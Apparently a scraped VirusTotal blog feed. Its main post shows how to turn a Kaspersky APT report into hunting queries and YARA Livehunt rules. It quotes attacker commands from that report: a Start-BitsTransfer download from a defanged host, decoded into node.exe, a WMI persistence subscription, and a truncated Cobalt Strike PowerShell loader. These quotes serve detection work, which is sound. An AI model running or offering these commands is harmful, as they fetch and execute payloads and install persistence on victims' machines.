While the field is still rapidly evolving, AI engines have demonstrated remarkable potential for automating and enhancing various analysis tasks, particularly those that are time-consuming and challenging, such as deobfuscation and interpreting suspicious behavior.</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 18pt 0pt;"><span style="background-color: transparent; color: #1f1f1f; font-family: "Google Sans", sans-serif; font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">Pinpointing whether malware is AI-generated remains a complex task due to the difficulty of tracing the origins of source code. Instead, we've encountered malware families employing AI themes for distribution, exploiting the current trend of AI-based threats. This opportunistic behavior is unsurprising, given attackers' tendency to capitalize on trending topics. The majority of these disguised samples are trojans targeting Windows systems, followed by Android samples. </span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 18pt 0pt;"><span style="background-color: transparent; color: #1f1f1f; font-family: "Google Sans", sans-serif; font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">While the integration of OpenAI APIs into certain RATs has been observed, the specific purpose and effectiveness of this integration remain unclear. It appears that RAT operators may be utilizing OpenAI APIs as a distraction tactic rather than leveraging their full potential for advanced malicious activities. 
Nonetheless, it is imperative to maintain vigilance and closely monitor how the usage of OpenAI APIs in RATs might evolve in the future.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #1f1f1f; font-family: "Google Sans", sans-serif; font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">As always, we would like to </span><a href="http://virustotal.com/contact" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "Google Sans", sans-serif; font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">hear</span></a><span style="color: #1f1f1f; font-family: "Google Sans", sans-serif; font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"> from you.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: black; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">Happy hunting!</span></p></span></div></span></span></div></span></span></div></span></div></span>Vicente Díazhttp://www.blogger.com/profile/11514421601563728512noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-1034039350643288532023-11-23T11:04:00.003+01:002023-11-23T17:30:11.089+01:00Actionable Threat Intel (VI) - A day in a Threat Hunter's life<div class="interval_12">Kaspersky's CTI analysts recently released their <a 
href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/11/09055246/Modern-Asian-APT-groups-TTPs_report_eng.pdf" target="_blank"> Asian APT groups</a> report, including details on behavior by different adversaries. Following our <a href="https://blog.virustotal.com/2023/10/the-path-from-vt-intelligence-queries.html" target="_blank">series</a> on making third-party intelligence actionable using VirusTotal Intelligence, we have put on our threat hunter’s hat to find samples and monitor activity based on the report’s details.
</div>
<div class="interval_12">Many of the behaviors shared by Kaspersky are based on the use of <a href="https://lolbas-project.github.io/" target="_blank">LOLBAS</a> by attackers once they have established a foothold on the victim. This is an increasing trend among adversaries, which makes it critical for security analysts to understand these binaries’ capabilities.
</div>
<div class="interval_12">Let’s start by analyzing the most interesting bits we found in the report.
</div>
<h2 style="text-align: left;">Start-BitsTransfer </h2>
<div class="interval_12">Start-BitsTransfer is a <a href="https://learn.microsoft.com/en-us/powershell/scripting/developer/cmdlet/cmdlet-overview?view=powershell-7.3" target="_blank">cmdlet</a> that <a href="https://learn.microsoft.com/en-us/powershell/module/bitstransfer/start-bitstransfer?view=windowsserver2022-ps" target="_blank">supports</a> the download of multiple files, and it seems to serve adversaries as an alternative to the more commonly used bitsadmin.exe binary. The report describes its use in several cases; here is one example:
</div>
<div class="my-yara-code interval_12">
PowerShell "Start-BitsTransfer -Source hxxp://security.lomiasecure[.]net/crx/node.txt -Destination C:\\Users\\public\\node.txt -transfertype download"<br />
PowerShell if($InputString = Get-Content 'C:\\users\\public\\node.txt'){ [System.IO.File]::WriteAllBytes('C:\\users\\public\\node.exe', [System.Convert]::FromBase64String($InputString))}
</div>
<div class="interval_12">The example uses FromBase64String and WriteAllBytes, so our query looks for either of them using an OR condition, together with the presence of the "Start-BitsTransfer" cmdlet in the sandbox’s behavior. The following VT Intelligence query returns samples with similar (not identical) behaviors.
</div>
<div class="my-yara-code interval_12">
<mark class="red">behavior_processes:</mark>"Start-BitsTransfer -Source" (<mark class="red">behavior_processes:</mark>"[System.Convert]::FromBase64String" or <mark class="red">behavior_processes:</mark>"[System.IO.File]::WriteAllBytes")</div>
<div class="interval_12">The <a href="https://www.virustotal.com/gui/search/behavior_processes%253A%2522Start-BitsTransfer%2520-Source%2522%2520(behavior_processes%253A%2522%255BSystem.Convert%255D%253A%253AFromBase64String%2522%2520or%2520behavior_processes%253A%2522%255BSystem.IO.File%255D%253A%253AWriteAllBytes%2522)/files" target="_blank">query</a> returns 12 suspicious samples. Activity seems to be clustered around October and November 2023. Some of the results are related, according to OSINT, to <a href="https://www.virustotal.com/gui/file/6b3aeeb01a2eaa36fdbfb6c07a86ffd7db6088c06662353812ab7b1a591d8078/details" target="_blank">APT33</a> and <a href="https://www.virustotal.com/gui/file/ff4b378d5e1de2232ab00a1262a3c848090f42538178c22366a3446c182b5957/details" target="_blank">The Gorgon Group:</a>
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/nSXQDfIQJS4jZqhVL8GiqJJ2A-qysaRV_SKmSlYAmLR8ShgZ3HUD0u6NRgu3eRkAtCqxi5NE0j_PWlXzsKhS47j9pZKIf5GvLCMRddTl-y0flPVUmx832she7hvX_ZdfaKr-gxbS0fWUnr112Hxl-t9NfMBkaGfIsDQYGVkjMIKagNPxEGUi5x1Ep_Q0Spg" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<h2 style="text-align: left;">WMI Event Subscription</h2>
<div class="interval_12">This technique is used by threat actors during lateral movement, mainly for execution and persistence. To achieve this, the WMI event subscription points to the payload to execute.
</div>
<div class="my-yara-code interval_12">
instance of __EventFilter { EventNamespace = "root\\cimv2"; Name = "Chrome Update"; Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >=240 AND TargetInstance.SystemUpTime < 325"; QueryLanguage = "WQL"; };
</div>
<div class="my-yara-code interval_12">
instance of CommandLineEventConsumer { ExecutablePath = "C:\\Windows\\System32\\GoogleUpdate.exe"; Name = "GoogleUpdater"; };
</div>
<div class="interval_12">There are different ways to search VirusTotal for samples with this behavior. In this case, we noticed the use of "ExecutablePath" rather than the more common "CommandLineTemplate" to specify the path to the payload. When “CommandLineTemplate” is null, the value of “ExecutablePath” is used instead, and the process is then executed by calling the “CreateProcess” API. The following VTI <a href="https://www.virustotal.com/gui/search/(behavior_processes%253A%2522EventNamespace%2520%253D%2522)%2520(behavior_processes%253A%2522Name%2520%253D%2522)%2520behavior_processes%253A%2522QueryLanguage%2520%253D%2520%255C%2522WQL%255C%2522%2522%2520(behavior_processes%253A%2522__EventFilter%2522%2520behavior_processes%253A%2522CommandLineEventConsumer%2522)%2520behavior_processes%253A%2522ExecutablePath%2520%253D%2522/files" target="_blank">query</a> is based on this finding:
</div>
<div class="my-yara-code interval_12">
(<mark class="red">behavior:</mark>"EventNamespace =") (<mark class="red">behavior:</mark>"Name =") <mark class="red">behavior:</mark>"QueryLanguage = \"WQL\"" (<mark class="red">behavior:</mark>"__EventFilter" <mark class="red">behavior:</mark>"CommandLineEventConsumer") <mark class="red">behavior:</mark>"ExecutablePath ="
</div>
<div class="interval_12">This query returns 41 results, including <a href="https://www.virustotal.com/gui/file/df47a0fe2ce6a7ec51249d641a36ae48da6623ece0056cfb5f381bf62a62c5d0/details" target="_blank">Konni</a> malware samples and samples attributed to APT37. Confirming our earlier assumption, using “<mark class="red">CommandLineTemplate =</mark>” instead of “<mark class="red">ExecutablePath =</mark>” returns 1.1k samples.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/WREsZALUNzganRM3BQ7RkAf_5YK4UgGuCHcBUfPzwugaXuw5bMs9LyTSzjaP4baArN2BdzNwhNfu1A8IF2e8reYLL78fpwqIEmc77YPClaFTCZzBF_H0CgDCfDi3WJWOZTbR25GPUoJsQxaIADPvs951MahPzCdRmO8k6YH6QqzvREcbTrmjJil4YwHhO-o" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12">Please note the use of "behavior" instead of "behavior_processes" in the previous VTI query. The reason is that WMI statements are commonly stored in the "Dataset actions", "Highlighted Text" and "Calls Highlighted" sections under the sample’s behavior. This is because WMI events do not launch new processes; they are handled by an ETW provider, so the sandbox maps these events under “behavior”. <a href="https://www.virustotal.com/gui/file/fe7cc5a2579668cb6afd239dc181c404ef602d72605fe46361e31cecb17187a2/behavior" target="_blank">Here</a> you can find an example.
</div>
<div class="interval_12">Another interesting way to hunt and monitor samples using this technique is through the following crowdsourced <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml" target="_blank">sigma rule</a>, which checks for WMI event subscriptions.
</div>
<div class="my-yara-code interval_12">
<mark class="red">sigma_rule:</mark>07b95c7eb376ac65a345dc6a2c1cb03732e085818d93bd1ea2e7d3706619d78e
</div>
<h2 style="text-align: left;">PowerShell capabilities</h2>
<div class="interval_12">Not surprisingly, PowerShell is one of the scripting languages most used by attackers. In particular, the following code injects Cobalt Strike in binary form into memory.
</div>
<div class="my-yara-code interval_12">
C:\Windows\system32\cmd.exe /b /c start /b /min PowerShell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+ '\sysnative\WindowsPowerShell\v1.0\PowerShell.exe'}else{$b='PowerShell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAIKCBWACA7VWa2+ bSBT9nEj5D6iyZFAcP5I0bSJVWsY2McR2jYlxbK+1IjDA1MMjMDgm3f73vYMhTbdp.... '))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))'; $s.UseShellExecute=$false;$s.RedirectStandardOutput=$true; $s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
</div>
<div class="interval_12">From the previous PowerShell, it is possible to create a <a href="https://www.virustotal.com/gui/search/behavior_processes%253A%2522%257B%2524b%253D'PowerShell.exe'%257D%2522%2520behavior_processes%253A%2522-nop%2520-w%2520hidden%2520-noni%2520-c%2522%2520behavior_processes%253A%2522%257B%2524b%253D%2524env%253Awindir%252B%2522/files" target="_blank">query</a> to detect patterns using the same memory injection technique. The resulting samples seem to mostly use it to inject Metasploit.
</div>
<div class="my-yara-code interval_12">
<mark class="red">behavior_processes</mark>:"{$b='PowerShell.exe'}" <mark class="red">behavior_processes</mark>:"-nop -w hidden -noni -c" <mark class="red">behavior_processes</mark>:"{$b=$env:windir+"
</div>
<div class="interval_12">Half of the results of the previous query correspond to Metasploit samples, mainly “.bat” scripts that execute “cmd.exe” to launch PowerShell and finally load the payload into memory in binary form.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/btWqGpYl30yKtTCB9S4qMW9XJSkst5gYXPZvLZOeWDF0S0RRiKkQQpsMoaOEbxQdHZIe0qdi3ghGQ3psiG9v1yOZf3V-7ZYN3Hw5kHoj1sB8X17qbqW6yS__frkglybtocg3Ll7OdUa1gYei2fZVsCNLUsYY1Q2A8Uh8-l7izPsbPEtw-Ux3DL4yc6vZnpA" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12">41 out of 44 results are identified by the same sigma rule, “Powershell Decrypt And Execute Base64 Data”, created by Joe Security. We can search for additional samples identified by this crowdsourced rule with the following VTI query.
</div>
<div class="my-yara-code interval_12">
<mark class="red">sigma_rule:</mark>d77da6b7c1a6f6530b4eb82ca84407ff02947b235ab29c94eade944c4f51e499
</div>
<h2 style="text-align: left;">Automate your queries 🚀</h2>
<div class="interval_12">The previous are simple examples of how a CTI team could consume tactical intelligence for hunting. Once the efficacy of the VTI queries has been assessed, it's time to convert them into VT Livehunt rules to automatically monitor any suspicious future activity. VTI queries can be easily translated into the YARA rules used by Livehunt thanks to the “vt” module. Let’s see how.
</div>
<div class="interval_12"><u><b>Start-BitsTransfer</b></u> </div>
<div class="interval_12">The Livehunt YARA rule resulting from our previous VTI query will automatically monitor and notify us of any new samples using the Start-BitsTransfer cmdlet technique discussed above. The cmdlet is usually invoked either from a script or directly in the command-line interpreter.
</div>
<div class="interval_12">In our YARA rule, we use different fields such as “terminated processes”, “executed commands” and “created processes” to look for the use of “Start-BitsTransfer”. Then we search processes created, processes terminated and command executions for traces of the “FromBase64” and “System.IO.File” strings, which are also needed for this technique. Finally, we added the “new file” modifier at the beginning to receive notifications only for fresh uploads.
</div>
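<div class="interval_12">As an added illustration of this translation (not the rule published in VirusTotal’s GitHub repository), the following Livehunt rule expresses the Start-BitsTransfer VTI query with the vt module; it assumes the vt module’s behaviour fields named above (command executions, processes created and terminated) and the new-file metadata flag, and the rule name is our own.</div>

```yara
import "vt"

// Added example, not the project's published rule. Translates the VTI query
//   behavior_processes:"Start-BitsTransfer -Source"
//   (behavior_processes:"FromBase64String" or behavior_processes:"WriteAllBytes")
// into a Livehunt condition over the vt module's behaviour fields.
rule Example_PowerShell_BitsTransfer_Base64_Drop
{
  meta:
    description = "Fresh upload whose sandbox run invokes Start-BitsTransfer and then decodes a dropped file from Base64"
    reference   = "Kaspersky Asian APT groups report, Start-BitsTransfer excerpt"

  condition:
    // "new file" modifier: notify only on fresh uploads, not rescans of known samples
    vt.metadata.new_file and

    // First half of the VTI query: the cmdlet seen in any command or process string
    (
      for any cmd in vt.behaviour.command_executions : (
        cmd icontains "Start-BitsTransfer -Source"
      ) or
      for any proc in vt.behaviour.processes_created : (
        proc icontains "Start-BitsTransfer -Source"
      ) or
      for any proc in vt.behaviour.processes_terminated : (
        proc icontains "Start-BitsTransfer -Source"
      )
    ) and

    // Second half (the OR condition): the decode-and-write step, matched on the
    // shorter "FromBase64" and "System.IO.File" fragments as described in the text
    (
      for any cmd in vt.behaviour.command_executions : (
        cmd icontains "FromBase64" or cmd icontains "System.IO.File"
      ) or
      for any proc in vt.behaviour.processes_created : (
        proc icontains "FromBase64" or proc icontains "System.IO.File"
      ) or
      for any proc in vt.behaviour.processes_terminated : (
        proc icontains "FromBase64" or proc icontains "System.IO.File"
      )
    )
}
```

Dropping the vt.metadata.new_file clause turns the same rule into a Retrohunt-style condition that also matches samples already in the corpus.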
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/AShXanqRuODtxpm0NK2YxrQk4q9SQtcKfKH1hJ2kEmUfZ7EbZ_TsSTJAIF4RUx1n0PfEG6xofRE2D6h6WeAKnGkRz40tiXa0AQhmQLpZ-zIFAeENTJLzy9thl0TD2J8OZ-XoVHmxTzwkJ1D7BhLATL68cFUOluf9o2qLMJKoYeANEXW6EEVEL2p5DfHyLSo" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12">🚀 Check out the <a href="https://github.com/VirusTotal/vt-public-crowdsourced-yara/blob/main/File/PowerShell_BitsTransfer_Execution.yar" target="_blank"> rule </a>on our GitHub </div>
<div class="interval_12"><u><b>WMI Event Subscription</b></u> </div>
<div class="interval_12">For this rule, we split the condition into two blocks. The first one searches for the patterns we used in our VTI query in “processes created”, “terminated” and “commands executed” during detonation. The second block searches for the same strings in a different set of fields, in this case “highlighted calls”, “highlighted text” and “system property lookups”, since WMI execution is also (though more rarely) stored in these fields, as previously discussed.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/WrPPMSR9hW4oA5qprZVJr2PONX1urr6h-UMY83-rf-aMkYRYXHJ-lPdCYozseJV2lkAk-edNYH4UyGqhQTkqojJreUzVgwMym7zdLMXEYd6aPKEctIYNOlcQ66Y2qe0Eindu_l_URp3vvBPTTjgupRa9mjpA3cpFzVQpz1KwXFgfMJuwr3VFIOEiKqSbBX8" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12">🚀 Check out the <a href="https://github.com/VirusTotal/vt-public-crowdsourced-yara/blob/main/File/WMI_Event_Subscription_Behaviors.yar" target="_blank"> rule </a>on our GitHub </div>
<div class="interval_12"><u><b>PowerShell capabilities</b></u> </div>
<div class="interval_12">This rule, like the previous ones, searches for patterns in “processes created”, “terminated” and “commands executed”. In addition, it also searches the telemetry generated by sigma rule matches, a powerful feature that is often overlooked. In this case, it searches the Windows XML EventLog (EVTX) events generated by our sandboxes for the same pattern we searched for in “behavior”.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/8X6cmFdY90NVF1apIBjJkXYp0FTmY0tCO3Fl3g2ot1vI7quKevVbrMMKmbq259O0f-WRz-5WZAiYtAa5mZigpFJGZfR-WcKWGIq4CgCe6ehyRXTCDxxuDOm-LKtb3SgDiM-aid4X1MwPAviNyYTjeWkoJuuULweD7clZ-PrA5CwR9M103CjRN5-C44DC70Q" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12">🚀 Check out the <a href="https://github.com/VirusTotal/vt-public-crowdsourced-yara/blob/main/File/PowerShell_Binary_Injection.yar" target="_blank"> rule </a>on our GitHub </div>
<h2 style="text-align: left;">Wrapping up</h2>
<div class="interval_12">Building VT Intelligence queries from third-party intelligence publications is one of the most common tasks for CTI teams, allowing a better understanding and calibration of the malicious campaign, threat hunting and monitoring. Queries based on TTPs can be easily generated thanks to all the details resulting from VirusTotal’s sandbox detonation. Once the query is polished and we are happy with the results, it can quickly be converted into a YARA Livehunt rule to automate the identification of new samples and monitor the evolution of the given campaign.
</div>
<div class="interval_12">The process illustrated in this blog can be used by any CTI, Threat Hunting and even Detection Engineering team to leverage external low-level tactical information for hunting; to better understand the campaigns and malware involved; to identify threat actors; to estimate the number of samples, their detection and their timeline; to monitor a campaign’s evolution; to extract IOCs for proactive protection; and to develop rules for internal detection.
</div>
<div class="interval_12">As usual, we are happy to <a href="https://www.virustotal.com/gui/contact-us">hear from you! </a>
</div>
<div class="interval_12">Happy hunting!
</div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
.my-yara-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: #F7F9F9;
color: Black;
/*padding: 24px;*/
border-collapse: collapse;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
mark.dark-blue {
color:Blue;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_10 {
width: 10%;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_90 {
width: 90%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>
Joseliyo Sánchezhttp://www.blogger.com/profile/15205592295367780978noreply@blogger.comtag:blogger.com,1999:blog-6871606241422173914.post-53109471320037639522023-11-21T11:07:00.006+01:002023-11-21T13:09:46.201+01:00The definitive VirusTotal’s admin guide<div class="interval_12">
<table>
<tbody><tr>
<td>
<img class="central_img width_40" src="https://lh7-us.googleusercontent.com/Uyi_3mh0LJLGF6zmDwNw3aN7LaFNAnlT30_Hnia1zNb4xHkJIcFMIKLjqQ9OcIAOpy5HRrys_9CwmufSMfD6ky4ZuBohT02hpqQuJMf7xaVyVfTm9ojFP-jSlIF-1e49Q9nszA6Qu2sQfvLqpb09Xa7-iArIsYF56vfW4qKJjYjupnUR5nl042g4UGoVH6U" />
</td>
<td class="content">
Check out our <a href="https://docs.virustotal.com/docs/admins-guide" target="_blank"><b>Walkthrough guide for VirusTotal group administrators</b></a>!
</td>
</tr>
</tbody></table>
</div>
<div class="interval_12">
VirusTotal administrators’ tasks are key to the good health of the groups they manage. Unfortunately, the best way to do a given task is not always clear. But we heard our beloved community, and we created the <a href="https://docs.virustotal.com/docs/admins-guide" target="_blank"><b>definitive guide</b></a> for everything a VirusTotal group administrator might need to know, including use cases, examples, where to find everything in the GUI and how to automate tasks using the API, with <a href="https://github.com/VirusTotal/vt-use-cases/tree/main/admins_guide" target="_blank">scripts</a> ready to use in our GitHub repository.
</div>
<div class="central_img width_100 interval_12">
<a href="https://docs.virustotal.com/docs/admins-guide" target="_blank">
<img src="https://lh7-us.googleusercontent.com/LmUk_gsu_tYXXjSi_ihBSC6X2P5EnTjTsMsQp_XGG1eA3JCPgcNAL1IVpSarZb3q54pSmx7FaLYyhtzBnf-Yy2fVgwS4GKCKRQ3Jc_TCPucRr38VatCOu-1Tl5VPzOGP6mxmakHGPX_Y2XTT6nJDp4sphQTVyA5LXIGmZx5VfF6xEApWxVam48Kjocd8vrA" /> </a>
</div>
<br />
<h2 style="text-align: left;">Introducing the walkthrough guide for VirusTotal group admins</h2>
<h3 style="text-align: left;">General notions</h3>
<div class="interval_12">
The guide begins with general notions and a quick overview of the <b>VT Enterprise group</b> web interface.
</div>
<div class="central_img width_80 interval_12">
<img src="https://lh7-us.googleusercontent.com/-51re0kovFJptycvukEP6f4E0mA_tH15mF-fQJUh0AHiPtk1gff3NpMCkhMkNpnGatfpb_4O3d5GnVpEe46XKYgJ0HOm0kiGjVAtNxakdfIw7h3biNZL4dxLyNA14rZPR7reffej_epIWC_2WZqlF5HUdznILfWlsVDOrjsEBAoOzT65BpMxyS_Pf0CtATA" />
</div>
<br />
<div class="interval_12">
In particular, we need to know where to retrieve IDs for <b>groups</b>, <b>users</b> and <b>service accounts</b>, as they are required for any VirusTotal API v3 interaction. The <b>administrator’s API key</b> is required for VirusTotal API authentication/authorization.
</div>
<div class="interval_12">
<ul>
<li><b>Group ID</b>: on the <b>VT Enterprise group</b> portal, the <b>GROUP PREFERENCES</b> section shows your <b>Group ID</b>.</li>
<li><b>User ID</b>: on the <b>VT Enterprise group</b> portal, the <b>Group members</b> section lists the group's users. By clicking on any of them, you automatically pivot to <b>USER PROFILE</b> where the user's ID is shown near the user's avatar.</li>
<li><b>Service account ID</b>: on the <b>VT Enterprise group</b> portal, the <b>Service accounts</b> section lists the group’s service accounts by their IDs.</li>
<li><b>VirusTotal user API key</b>: there are 2 ways of getting your API key from the <a href="https://www.virustotal.com/gui/home/search" target="_blank">landing page</a> as in the below image.</li>
</ul>
</div>
<div class="central_img width_80 interval_12">
<img src="https://lh7-us.googleusercontent.com/-0e6PjCaavu74XWregwa0eQ0u4yCw1Fx1XAqS1PKJyeDh7pynLRNGcDbHmABGOGDNZhAn5fOH6kkOSYIgWC8zd3Eg63pZaxewp9XTBNeeMg2HpaRbnOzAxaiIPOyMSlF32npNIofqq2rfatya41UfPvr2dnxRuSzHthWuVRoRfqaprIRNybc0Q2cOf8aWgM" />
</div>
<br />
<h3 style="text-align: left;">Use cases</h3>
<div class="interval_12">
The second part of the guide describes every action a VirusTotal admin can perform, split into sections for easier reference:
</div>
<ul>
<li><b>Group members management</b>
<div>In this section you will find how to manage users and service accounts by adding them to or removing them from the group, how to download a list of members and how to manage users’ privileges.</div>
</li>
<li><b>Group management</b>
<div>This section focuses on group-level configurations that may also affect users, such as active session timings and Single Sign On (SSO) security features.</div>
</li>
<li><b>Consumption</b>
<div>In this section you will find information about one of the most requested topics: quota and consumption.</div>
</li>
</ul>
<div class="interval_12">
Each use case has a descriptive title to easily identify what you are looking for, the <b>Web interface</b> section describing use cases in the GUI, and details on <b>VirusTotal API</b> v3 endpoints that can be used to automate the use case, including <b>API examples</b> linking to our GitHub repository for most cases.
</div>
<br />
<h4 style="text-align: left;">Enforcing security - 2FA</h4>
<div class="interval_12">
As an example, and focusing on a security perspective, let’s say that we want to obtain all users in our group without 2FA enabled.
In the <b>VT Enterprise group</b> web interface you will find the <b>USERS</b> tab, and under the <b>Group members</b> section there is a <b>Filter by</b> dropdown with the <b>View only users without 2FA</b> option:
</div>
<div class="central_img width_40 interval_12">
<img src="https://lh7-us.googleusercontent.com/7oum7QNYjbr4Kk_uPyAvYZEEWtpL9iywRz7ZU_mN7SqUp5Sp-18mVvAFp1Ufs3-SUNuT9-K5Vlw8ky19YVKo5PUv4jR_X9qxrC8K-iO7tsLoXG4NlPyj98U87gLEFD25K9uSUKEF4AsMGGD-RpqFBcMiaD4rsmvDoeZTvGhWAVnRaP8qq4_iFzeqtbb64PQ" />
</div>
<div class="interval_12">
The same can be automated with the API with a simple script.
</div>
<div class="my-code interval_12">
<mark class="gray">"""</mark><br />
<mark class="gray">**DISCLAIMER:**</mark><br />
<mark class="gray">Please note that this code is for educational purposes only.</mark><br />
<mark class="gray">It is not intended to be run directly in production.</mark><br />
<mark class="gray">This is provided on a best effort basis.</mark><br />
<mark class="gray">Please make sure the code you run does what you expect it to do.</mark><br />
<mark class="gray">"""</mark><br />
<mark class="orange">import</mark> requests <br /><br />
<mark class="orange">def</mark> <mark class="yellow">get_users_without_2fa</mark>(apikey, group_id):<br />
<mark class="gray">"""</mark><br />
<mark class="gray">Getting users objects related to a group by group ID, filtering by 2fa_enabled = false.</mark><br />
<mark class="gray">Requested users attributes: first_name,last_name,email.</mark><br />
<mark class="gray">VT API endpoint reference: https://developers.virustotal.com/reference/groups-relationships</mark><br />
<mark class="gray">"""</mark><br />
users = []<br />
url = <mark class="green">f"https://www.virustotal.com/api/v3/groups/{group_id}/users?attributes=first_name,last_name,email&filter=2fa_enabled:false"</mark><br />
headers = {<mark class="green">"accept"</mark>: <mark class="green">"application/json"</mark>, <mark class="green">"x-apikey"</mark>: apikey}<br />
<mark class="orange">while</mark> url:<br />
res = requests.get(url, headers=headers)<br />
res.raise_for_status()<br />
res = res.json()<br />
<mark class="orange">for</mark> el <mark class="orange">in</mark> res[<mark class="green">"data"</mark>]:<br />
users.append(<br />
<mark class="green">f"username:{el['id']},"</mark><br />
<mark class="green">f"first_name:{el['attributes'].get('first_name','')},"</mark><br />
<mark class="green">f"last_name:{el['attributes'].get('last_name','')},"</mark><br />
<mark class="green">f"email:{el['attributes'].get('email','')}"</mark><br />
)<br />
url = res.get(<mark class="green">"links"</mark>, {}).get(<mark class="green">"next"</mark>, <mark class="orange">None</mark>)<br />
<mark class="orange">return</mark> users
</div>
<div class="interval_12">
For this we used the <a href="https://developers.virustotal.com/reference/groups-relationships" target="_blank">/v3/groups/{group_id}/{relationship}</a> endpoint with the ‘users’ relationship, filtering by “2fa_enabled” equal to “false” and requesting the “first_name”, “last_name” and “email” attributes for each of them.
Check it out on our <a href="https://github.com/VirusTotal/vt-use-cases/blob/main/admins_guide/getting_users_without_2fa.py" target="_blank">GitHub repository</a>!
</div>
<br />
<h4 style="text-align: left;">Enforcing security - privileges are granted where required</h4>
<div class="interval_12">
It is very important to monitor that admin privileges are only granted to users who require them to perform their jobs. Tracking admin privileges on a regular basis is a very healthy task.
</div>
<div class="interval_12">
